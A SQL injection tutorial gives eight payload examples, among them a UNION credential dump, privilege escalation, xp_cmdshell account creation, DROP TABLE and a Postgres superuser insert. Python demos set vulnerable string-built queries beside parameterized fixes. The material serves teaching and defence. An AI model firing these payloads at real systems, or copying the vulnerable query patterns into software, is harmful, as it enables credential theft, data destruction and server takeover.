Hacking Techniques
Example 1
Server Code: SELECT * FROM users WHERE userid = $input
Injection for $input: 99 OR TRUE
Executed Command: SELECT * FROM users WHERE userid = 99 OR TRUE
This may permit the hacker to obtain all usernames and passwords, as the WHERE clause always evaluates to TRUE.

Example 2
Server Code: SELECT * FROM users WHERE username = '$input'
Injection for $input: ' OR TRUE --
Executed Command: SELECT * FROM users WHERE username = '' OR TRUE -- '
This may permit the hacker to obtain all usernames and passwords, as the WHERE clause always evaluates to TRUE. Ending a string immediately with the single quote and commenting out the rest of the query are common forms of SQL injection.

Example 3
Server Code: SELECT id, name, dt, size FROM products WHERE size='$size'
Injection for $size: ' UNION SELECT '1', CONCAT(uname,'-',passwd) AS NAME, '2000-01-01', '0' FROM users --
Executed Command: SELECT id, name, dt, size FROM products WHERE size='' UNION SELECT '1', CONCAT(uname,'-',passwd) AS NAME, '2000-01-01', '0' FROM users --'
This obtains the usernames and passwords even when the table containing them is not being accessed directly, by appending a second SELECT whose column count and types match the original one.

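As an added illustration (not code from the original page), the following Python program recreates the read-path Examples 1 to 3 against an in-memory SQLite database with constructed sample rows, placing the parameterized form of each query beside the string-built one. SQLite is an assumption: its `||` operator stands in for the page's CONCAT, and the `uname` column of Example 3 is folded into the `username` column used by Example 2 so one `users` table serves all three examples.

```python
import sqlite3


def make_db():
    """Constructed in-memory sample data shaped like the page's users/products tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (userid INTEGER, username TEXT, passwd TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice-secret'),
                                 (2, 'bob',   'bob-secret');
        CREATE TABLE products (id INTEGER, name TEXT, dt TEXT, size TEXT);
        INSERT INTO products VALUES (10, 'widget', '2020-01-01', 'M'),
                                    (11, 'gadget', '2020-02-02', 'L');
    """)
    return conn


def user_by_name_vulnerable(conn, name):
    # Example 2's server code: the input is spliced into the SQL text.
    sql = "SELECT * FROM users WHERE username = '%s'" % name
    return conn.execute(sql).fetchall()


def user_by_name_safe(conn, name):
    # Bound parameter: the quote, OR and -- in the input are just characters
    # of the value, never part of the statement.
    return conn.execute("SELECT * FROM users WHERE username = ?", (name,)).fetchall()


def user_by_id_safe(conn, raw_input):
    # Example 1 takes an unquoted number, so there is no quote to escape;
    # validate the type before any SQL is built, then bind the integer.
    userid = int(raw_input)  # "99 OR TRUE" fails here with ValueError
    return conn.execute("SELECT * FROM users WHERE userid = ?", (userid,)).fetchall()


def products_by_size_vulnerable(conn, size):
    # Example 3's server code.
    sql = "SELECT id, name, dt, size FROM products WHERE size='%s'" % size
    return conn.execute(sql).fetchall()


def products_by_size_safe(conn, size):
    sql = "SELECT id, name, dt, size FROM products WHERE size=?"
    return conn.execute(sql, (size,)).fetchall()


# The page's payloads for Examples 2 and 3 (the UNION one adapted to SQLite's ||
# concatenation and to the username column of the constructed table).
TAUTOLOGY_PAYLOAD = "' OR TRUE --"
UNION_PAYLOAD = ("' UNION SELECT '1', username || '-' || passwd AS NAME, "
                 "'2000-01-01', '0' FROM users --")


if __name__ == "__main__":
    conn = make_db()
    print("string-built, tautology:", user_by_name_vulnerable(conn, TAUTOLOGY_PAYLOAD))
    print("parameterized, tautology:", user_by_name_safe(conn, TAUTOLOGY_PAYLOAD))
    print("string-built, UNION:", products_by_size_vulnerable(conn, UNION_PAYLOAD))
    print("parameterized, UNION:", products_by_size_safe(conn, UNION_PAYLOAD))
```

The string-built queries return every user row (tautology) and the user credentials in place of product rows (UNION); the parameterized queries return nothing for the same inputs, because the payload is compared as a literal value. The point of `user_by_id_safe` is that a placeholder alone is not enough when the column is numeric: the application must also reject input that is not a number.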
Example 4
Server Code: UPDATE usertable SET password='$pwd' WHERE username='$uid'
Injection for $pwd: xxx
Injection for $uid: ' OR uid LIKE '%admin%
Executed Command: UPDATE usertable SET password='xxx' WHERE username='' OR uid LIKE '%admin%'
This changes the admin's password.

Example 5
Server Code: UPDATE usertable SET password='$pwd' WHERE username='$uid'
Injection for $pwd: xxx', trusted=100, admin='yes
Executed Command: UPDATE usertable SET password='xxx', trusted=100, admin='yes' WHERE username='...'
This grants more privileges to an account illegally, because the injected text adds extra column assignments to the SET clause.

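Examples 4 and 5 attack the write path, so the damage is a changed row rather than leaked data. The following Python program (an added example, not from the original page) replays both payloads against a constructed in-memory SQLite `usertable` and contrasts the page's server code with a version that binds both inputs and, as defence in depth, refuses to commit unless exactly one row was affected. SQLite and the column set (`uid`, `username`, `password`, `trusted`, `admin`) are assumptions taken from the examples.

```python
import sqlite3


def make_db():
    """Constructed in-memory sample data shaped like the page's usertable."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE usertable (
            uid TEXT, username TEXT, password TEXT, trusted INTEGER, admin TEXT);
        INSERT INTO usertable VALUES ('u1',     'alice', 'old-a', 0, 'no'),
                                     ('admin1', 'root',  'old-r', 0, 'yes');
    """)
    return conn


def account(conn, username):
    """(password, trusted, admin) for one account, to observe what an update did."""
    return conn.execute(
        "SELECT password, trusted, admin FROM usertable WHERE username = ?",
        (username,)).fetchone()


def set_password_vulnerable(conn, uid, pwd):
    # The page's server code: both inputs are spliced into the statement.
    sql = "UPDATE usertable SET password='%s' WHERE username='%s'" % (pwd, uid)
    with conn:  # commits on success
        return conn.execute(sql).rowcount


def set_password_safe(conn, uid, pwd):
    # Bound parameters keep each input inside its own value slot, so neither a
    # second predicate (Example 4) nor extra assignments (Example 5) can be added.
    # The row-count guard is defence in depth: a password change must touch
    # exactly one account; otherwise the `with` block rolls back on the exception.
    with conn:
        cur = conn.execute(
            "UPDATE usertable SET password=? WHERE username=?", (pwd, uid))
        if cur.rowcount != 1:
            raise RuntimeError("expected exactly one row, got %d" % cur.rowcount)
        return cur.rowcount


# Payloads from Examples 4 and 5.
ADMIN_UID_PAYLOAD = "' OR uid LIKE '%admin%"
PRIVILEGE_PWD_PAYLOAD = "xxx', trusted=100, admin='yes"


if __name__ == "__main__":
    conn = make_db()
    set_password_vulnerable(conn, ADMIN_UID_PAYLOAD, "xxx")
    print("string-built, Example 4, root row:", account(conn, "root"))
    set_password_vulnerable(conn, "alice", PRIVILEGE_PWD_PAYLOAD)
    print("string-built, Example 5, alice row:", account(conn, "alice"))

    conn = make_db()
    try:
        set_password_safe(conn, ADMIN_UID_PAYLOAD, "xxx")
    except RuntimeError as exc:
        print("parameterized, Example 4 refused:", exc)
    set_password_safe(conn, "alice", PRIVILEGE_PWD_PAYLOAD)
    print("parameterized, Example 5, alice row:", account(conn, "alice"))
```

With the string-built statement the root account's password becomes `xxx` (Example 4) and alice gains `trusted=100, admin='yes'` (Example 5). With bound parameters the Example 4 input matches no row, so the guard rejects the change, and the Example 5 input simply becomes alice's new password text while `trusted` and `admin` stay untouched. Logging every rejected update is a cheap detection signal for this class of attack.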
Example 6
Server Code: SELECT * FROM products WHERE id LIKE '%$prod%'
Injection for $prod: a%' exec master..xp_cmdshell 'net user test testpass /ADD' --
Executed Command: SELECT * FROM products WHERE id LIKE '%a%' exec master..xp_cmdshell 'net user test testpass /ADD' -- %'
This lets the attacker run operating system commands on the machine hosting Microsoft SQL Server (here through the xp_cmdshell extended stored procedure), giving them access to the host itself.

Example 7
Server Code: SELECT * FROM users WHERE userid = $input
Injection for $input: 99; DROP TABLE suppliers
Executed Command: SELECT * FROM users WHERE userid = 99; DROP TABLE suppliers
This deletes a table from the database illegally. Note that this hacking technique works only in systems that support multiple batched SQL statements within a query. Some PHP systems support only one SQL statement per query.

Example 8
Server Code: SELECT id, name FROM products ORDER BY name LIMIT 30 OFFSET $offset
Injection for $offset: 0; insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd) select 'crack', usesysid, 't','t','crack' from pg_shadow where usename='postgres'; --
Executed Command: SELECT id, name FROM products ORDER BY name LIMIT 30 OFFSET 0; insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd) select 'crack', usesysid, 't','t','crack' from pg_shadow where usename='postgres'; --
This grants the hacker superuser access. Note that this hacking technique works only in systems that support multiple batched SQL statements within a query. Some PHP systems support only one SQL statement per query.
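The note under Examples 7 and 8 says stacked statements only work where the database API executes batches. Whether that holds is a property of the specific call, not of the database, as the following added example (not code from the original page) shows with Python's standard `sqlite3` module: `execute()` refuses more than one statement per call, while `executescript()` on the very same string runs the batch and drops the table. SQLite, the constructed `users`/`suppliers` tables and the integer validation in `lookup_safe` are assumptions; the payload is Example 7's.

```python
import sqlite3


def make_db():
    """Constructed in-memory tables shaped like Example 7's users and suppliers."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (userid INTEGER, uname TEXT);
        INSERT INTO users VALUES (99, 'alice');
        CREATE TABLE suppliers (id INTEGER, name TEXT);
        INSERT INTO suppliers VALUES (1, 'acme');
    """)
    return conn


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)).fetchone()
    return row is not None


def lookup_concatenated(conn, raw_input):
    """Example 7's server code through execute(): ('rows', rows) or ('rejected', msg)."""
    sql = "SELECT * FROM users WHERE userid = %s" % raw_input
    try:
        return "rows", conn.execute(sql).fetchall()
    except (sqlite3.ProgrammingError, sqlite3.Warning) as exc:
        # The driver refuses a second statement in one execute() call; this is
        # the "one SQL statement per query" behaviour the page refers to.
        return "rejected", str(exc)


def lookup_batched(conn, raw_input):
    """Same concatenation through executescript(), which does run batches.

    Returns whether the suppliers table still exists afterwards."""
    sql = "SELECT * FROM users WHERE userid = %s" % raw_input
    conn.executescript(sql)
    return table_exists(conn, "suppliers")


def lookup_safe(conn, raw_input):
    # The actual fix does not depend on the driver: validate the numeric input
    # and bind it, so "99; DROP TABLE suppliers" never reaches the SQL parser.
    userid = int(raw_input)  # raises ValueError for anything but an integer
    return conn.execute("SELECT * FROM users WHERE userid = ?", (userid,)).fetchall()


STACKED_PAYLOAD = "99; DROP TABLE suppliers"


if __name__ == "__main__":
    conn = make_db()
    print("execute():", lookup_concatenated(conn, STACKED_PAYLOAD))
    print("suppliers still present:", table_exists(conn, "suppliers"))
    print("executescript(), suppliers still present:", lookup_batched(conn, STACKED_PAYLOAD))
```

The lesson for a defender is that relying on a driver's single-statement rule is fragile: a later refactor to a batch-capable call (or a different database library) silently re-enables Examples 7 and 8, whereas validated, bound parameters remain safe regardless of the API used.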